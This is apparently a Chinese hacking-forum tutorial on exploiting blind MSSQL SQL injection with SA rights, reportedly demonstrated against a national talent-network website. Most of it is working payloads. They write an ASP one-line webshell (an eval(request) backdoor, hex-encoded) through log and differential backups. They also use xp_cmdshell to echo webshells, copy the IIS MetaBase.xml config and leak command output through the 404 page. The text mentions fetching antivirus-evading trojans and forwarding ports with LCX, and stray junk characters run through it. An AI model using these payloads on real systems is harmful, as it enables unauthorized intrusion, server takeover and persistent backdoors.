sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————


5 w( l4 `5 q2 t2 M$ `                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

& X4 P1 d7 j$ g7 D8 S                                                                 
) N' k2 q( ]6 S2 P3 L/ N                                                                 
                                                                  论坛： http://www.90team.net/


7 H1 ?9 Q, I" J/ C
  s/ y+ x* y( A0 x# W8 t0 c, C友情检测国家人才网
: m  O2 m/ E% M9 q

  d) c) B% g: M) j4 D内容：MSSQL注入SA权限不显错模式下的入侵

# ^) w# t3 B/ i! F
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
* h5 S- C) F" }; k7 `
6 d3 i) v9 [3 s
" T! {4 K) @- R* d0 n* ^( t这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
1 B; ~6 a/ V8 \1 }9 \$ B0 S
; a* t% b9 x5 A' E% a思路：

首先：
* h, ^+ B& }( q& H- a
/ j2 Y# V- Y' }9 I7 Z) ^3 a通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

1.日志备份获得Webshell
% K6 B" V" y  C
& ]9 [& d2 k1 T& d' @8 a8 b$ `2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。
. q2 y4 j# Q  r+ S1 m6 V* W
7 C; R$ t# t& F! L$ M3 X5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。

% x2 O+ C( B; u2 E
+ l" y" |- P9 S/ H6 r( v5 }
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
* j/ L- {8 F' `+ P' q4 o# z
我直接演示后面一个方法
8 h7 w, z( t  K- L

6 ~) {5 q: V" ]4 B6 u分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL

# p5 H. \# O' I) _/ X! L


' N2 N6 H' Y0 Y! }# z- D3 `◆日志备份：

  X! J7 c4 ]6 \6 v) g
4 ]' k. q2 s, J3 L! ?$ [1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
* B1 v' w4 R& |
1 N7 Z$ D( u7 F8 r$ P5 l4 y6 I2. 插入数据
3 ^' F& X4 q) r( d" j% r( S+ d;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
! p& S3 E, }+ q  j
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
) ?) c+ \4 o8 M: }0 f  b

3 T& b3 _* \: B, r* A( D
◆数据库差异备份

（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
6 @# E2 q, T1 L( I7 U2 @) [; E
9 ^) \# N, R% ?  V6 O( m上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
. K2 P* S8 T3 p( M* I( m
& }2 m' {1 V# q4 ^2 N* j! w
（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
( T- Z- R6 ^$ J2 Q" A
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ M% t& X7 m6 h! D* |2 _. @
/ L  u- H& S- P( ^3. 备份数据库并清理临时文件

0 p( ~, W. v) L5 p" A;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
* ?* L. w7 ^0 T& s  {
0 o1 D* E" R9 p5 K0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
/ _; W; }' l, Q8 v) N  n4 s

; l" m; |, L. U0 t: {. o5 v  o
用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
3 T# E+ I& D; r+ `* M( w
6 S/ i; ^, T" b+ y! n% L2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
& ~& b4 s  p& z
读取IIS配置信息获取web路径
- A$ ]1 ?6 \! K6 r1 z% i
     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
- S" Q( Y  L& y% G: d) W! d, H. B     
# n9 m/ c' Y7 D- a  H7 P     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
) J5 }* b. m4 U; T$ j. M' _

; M+ n  M$ w' Q
. V' ^! {6 d4 J# z


9 g1 q; h: h5 ^; F. p* P

4 [9 F$ f& V6 x& W

3 v- B: G( R% U' j






7 X% ]( I3 e" ?8 W( s( m. p1 I! ?4 M



4 d. y$ G/ o2 M' j; Y$ i) h

' ?6 V( j  T; ^) r
: e8 _( Q& E5 N' D3 x) @, Z" h

! p$ J  l  q0 ^# B1 V+ T+ k8 S% r
8 |# Z2 Z5 r" n* j" Q9 F" C* q
, t0 f9 S  n% E7 x: U
% a6 |" e2 X5 I+ }% ~


7 D" w! O1 G8 a" s
, C- X" S  C1 ], B) q* m4 M

/ B% X" z& m6 b; N& W; }/ d
0 D; {) w: C& m6 N! o- q0 i

4 K9 t. J8 J7 z' A+ c
! d( Q: v: q) n
5 n% p2 J3 ?1 f% k7 s0 L" e+ W